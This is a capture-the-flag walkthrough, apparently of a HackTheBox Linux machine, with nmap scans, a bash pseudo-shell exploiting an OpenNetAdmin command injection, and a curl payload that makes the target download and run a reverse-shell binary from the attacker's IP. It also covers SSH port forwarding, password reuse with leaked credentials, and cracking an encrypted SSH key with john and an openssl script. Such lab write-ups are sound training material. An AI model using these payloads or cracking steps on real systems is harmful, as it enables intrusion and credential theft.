```
$ sudo nmap -p- -sS 10.10.10.171 -oA nmap_ports
[sudo] password for noraj:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-13 10:45 CET
Nmap scan report for 10.10.10.171
Host is up (0.025s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 31.23 seconds
```

```
$ sudo nmap -p 80,22 -sSCV 10.10.10.171 -oA nmap_services
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-13 10:46 CET
Nmap scan report for 10.10.10.171
Host is up (0.024s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.89 seconds
```
At some point I got bored of the pseudo-shell via the RCE exploit, so I decided
to get a Meterpreter reverse shell. A better reason is that we can't use an
interactive client such as the mysql client from the RCE, so we need a real shell.
The RCE exploit is pretty simple:
```bash
#!/bin/bash
# Pseudo-shell over the OpenNetAdmin command injection: whatever is typed at the
# prompt is injected into the "ip" argument of the ping tooltip handler, wrapped
# in BEGIN/END markers so the command output can be cut out of the HTML response.
URL="${1}"   # e.g. http://10.10.10.171/ona/login.php
while true; do
  echo -n "$ "
  read -r cmd
  curl --silent \
    -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" \
    "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
```
So to upload and execute my reverse shell I tried:

```bash
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";wget http://10.10.15.151:443/80.bin; chmod +x 80.bin; ./80.bin ;echo \"END\"&xajaxargs[]=ping" "http://10.10.10.171/ona/login.php" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
```
The shell wasn't executed because we can't `chmod +x` for whatever reason.
So I tried a trick to execute the shell without the executable bit:
`/lib64/ld-linux-x86-64.so.2 /opt/ona/www/80.bin`, but it didn't work.
We can see the public web server listening on all interfaces on port 80, the SSH
server, the internally exposed database on port 3306, but what's running on port
52846? Seems it's a web server.
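Before poking at the internal services it helps to separate what is bound to every interface from what only answers on loopback: the latter can only be reached through a pivot (requests issued from the foothold shell, or an SSH `-L` forward once we have an account). The bash snippet below is an added example, not code from the write-up: it takes `ss -lnt` style output and prints the local-only ports plus the forward command that exposes them. The sample table is constructed to mirror the services described above (it was not captured from the box), and `user@10.10.10.171` is a placeholder for whatever account the forward would use.

```bash
#!/usr/bin/env bash
# Classify listening sockets as "public" (wildcard or interface address) or
# "local" (127.x / ::1) and build the ssh -L forward for the local-only ones.
set -euo pipefail

# Constructed sample of `ss -lnt` output (State Recv-Q Send-Q Local:Port Peer:Port).
# Modeled on the write-up's description, not real capture from the target.
SAMPLE_SS='State   Recv-Q Send-Q Local Address:Port  Peer Address:Port
LISTEN  0      80     127.0.0.1:3306     0.0.0.0:*
LISTEN  0      128    127.0.0.1:52846    0.0.0.0:*
LISTEN  0      128    0.0.0.0:22         0.0.0.0:*
LISTEN  0      128    *:80               *:*
LISTEN  0      128    [::]:22            [::]:*'

# Read ss output on stdin, print one "scope port" line per LISTEN row (deduplicated).
classify_listeners() {
  awk '$1 == "LISTEN" {
         addr = $4
         port = addr; sub(/.*:/, "", port)          # text after the last colon
         if (addr ~ /^127\./ || substr(addr, 1, 5) == "[::1]") scope = "local"
         else scope = "public"
         print scope, port
       }' | sort -u
}

# Local-only ports, one per line, numerically sorted. Reads ss output on stdin.
local_only_ports() {
  classify_listeners | awk '$1 == "local" { print $2 }' | sort -n
}

# ssh -N command forwarding every local-only port to the same port on our
# loopback, e.g. "-L 52846:127.0.0.1:52846". $1 = user@host; stdin = ss output.
forward_command() {
  local fwd="" p
  for p in $(local_only_ports); do
    fwd="$fwd -L $p:127.0.0.1:$p"
  done
  printf 'ssh -N%s %s\n' "$fwd" "$1"
}

# Demo on the constructed sample.
printf '%s\n' "$SAMPLE_SS" | classify_listeners
printf '%s\n' "$SAMPLE_SS" | forward_command user@10.10.10.171
```

On the sample this reports 22 and 80 as public and 3306 and 52846 as local-only, and prints `ssh -N -L 3306:127.0.0.1:3306 -L 52846:127.0.0.1:52846 user@10.10.10.171`; with that forward up, the curl requests below can be run against `127.0.0.1:52846` from the attacking machine instead of through the RCE pseudo-shell.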
There is a login page on 127.0.0.1:52846, so let's try to log in with the creds we
found in the database.

```bash
curl -X POST http://127.0.0.1:52846/index.php --data 'username=admin&password=admin&login=Submit'
```

I get `Wrong username or password.` :(
But if we take a look at the owner of the internal website, it seems to be jimmy:

```
www-data@openadmin:/var/www$ ls -lh
total 8.0K
drwxr-xr-x 6 www-data www-data 4.0K Nov 22 15:59 html
drwxrwx--- 2 jimmy    internal 4.0K Mar 13 15:53 internal
lrwxrwxrwx 1 www-data www-data   12 Nov 21 16:07 ona -> /opt/ona/www
```
It would be helpful to read the source code, but as www-data we are not in the
internal group, so we need to connect as jimmy to read it.
A big guessing step is involved here: we needed to re-use the MySQL ona_sys user
password (`n1nj4W4rri0R!`) as jimmy's PAM password for SSH.
I think the idea was credential stuffing: if jimmy is the dev of the internal
web app, he may have reused his own personal password for dev purposes like the
DB.
Now we can connect and look at the source code:

```
$ ssh jimmy@10.10.10.171
jimmy@openadmin:~$ ls -la /var/www/internal/
total 20
drwxrwx--- 2 jimmy internal 4096 Mar 13 15:53 .
drwxr-xr-x 4 root  root     4096 Nov 22 18:15 ..
-rwxrwxr-x 1 jimmy internal 3229 Nov 22 23:24 index.php
-rwxrwxr-x 1 jimmy internal  185 Nov 23 16:37 logout.php
lrwxrwxrwx 1 jimmy jimmy      17 Mar 13 15:53 lol -> /var/www/html/lol
-rwxrwxr-x 1 jimmy internal  339 Nov 23 17:40 main.php
```
We could also have looked at main.php directly on the file system, but I
wanted to follow the application logic.
It seems we have a private key for the joanna user, which is encrypted and
passphrase protected, but we also have a hint to crack it:

> Don't forget your "ninja" password.
```
$ ssh2john id_rsa
/usr/bin/ssh2john:103: DeprecationWarning: decodestring() is a deprecated alias since Python 3.1, use decodebytes()
  data = base64.decodestring(data)
id_rsa:$sshng$1$16$2AF25344B8391A25A9B318F3FD767D6D$1200$...
```

```
$ john --wordlist=/usr/share/wordlists/password/rockyou.txt john.txt
Warning: detected hash type "SSH", but the string is also recognized as "ssh-opencl"
Use the "--format=ssh-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas      (id_rsa)
Warning: Only 1 candidate left, minimum 2 needed for performance.
1g 0:00:00:08 DONE (2020-03-13 17:35) 0.1237g/s 1774Kp/s 1774Kc/s 1774KC/s *7¡Vamos!
Session completed
```
The password is bloodninjas to unlock the private key of joanna.
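The john output above tells the story of why this was quick: the key uses the legacy OpenSSL PEM encryption (`Proc-Type`/`DEK-Info` header, the `MD5/AES` cost), whose key derivation is a single MD5 over the passphrase and an 8-byte IV salt, so john tries well over a million candidates per second. The bash script below is an added example, not part of the write-up, showing the same wordlist attack with `openssl rsa` as the decryption oracle. It generates its own throwaway key and a constructed mini wordlist so it runs offline; it assumes an `openssl` binary on PATH. Note that recent OpenSSL versions may write the encrypted key in PKCS#8 form rather than the legacy header seen on the page; the oracle accepts either.

```bash
#!/usr/bin/env bash
# Offline wordlist attack on a passphrase-protected private key, using
# "openssl rsa" to test each candidate. Added example; key and wordlist are
# generated/constructed below, nothing here comes from the target.
set -euo pipefail

WORK="$(mktemp -d)"
trap 'rm -rf "$WORK"' EXIT

# Create a small encrypted test key so the demo runs without any real loot.
# (Assumption: openssl is installed. 1024 bits only to keep the demo fast.)
make_test_key() {            # $1 = output path, $2 = passphrase
  local plain="$WORK/plain.$$.pem"
  openssl genrsa -out "$plain" 1024 2>/dev/null
  openssl rsa -in "$plain" -aes128 -passout "pass:$2" -out "$1" 2>/dev/null
  rm -f "$plain"
}

# Return 0 if $2 decrypts the key at $1. "-noout" parses the key and discards
# it; openssl exits non-zero when the passphrase is wrong.
try_passphrase() {           # $1 = key path, $2 = candidate passphrase
  openssl rsa -in "$1" -passin "pass:$2" -noout >/dev/null 2>&1
}

# Walk a wordlist (one candidate per line, blank lines skipped), print the
# first passphrase that works and return 0; return 1 if the list is exhausted.
crack_key() {                # $1 = key path, $2 = wordlist path
  local cand
  while IFS= read -r cand || [ -n "$cand" ]; do
    [ -z "$cand" ] && continue
    if try_passphrase "$1" "$cand"; then
      printf '%s\n' "$cand"
      return 0
    fi
  done < "$2"
  return 1
}

# --- demo ---------------------------------------------------------------
# Constructed mini wordlist in the spirit of the "ninja" hint; one entry is
# the passphrase the test key was encrypted with.
make_test_key "$WORK/id_rsa" "bloodninjas"
cat > "$WORK/words.txt" <<'EOF'
ninja
ninjas
ninja123
password
bloodninjas
ninjawarrior
EOF

if found="$(crack_key "$WORK/id_rsa" "$WORK/words.txt")"; then
  echo "passphrase found: $found"
else
  echo "passphrase not in wordlist" >&2
fi
```

Spawning a process per candidate is orders of magnitude slower than john's in-process MD5+AES check, so this is for understanding the attack or for a tiny targeted list when john is not at hand; for rockyou-sized lists, `ssh2john` plus `john` (or hashcat's equivalent mode) is the right tool. Once the passphrase is known, `ssh -i id_rsa joanna@10.10.10.171` will prompt for it.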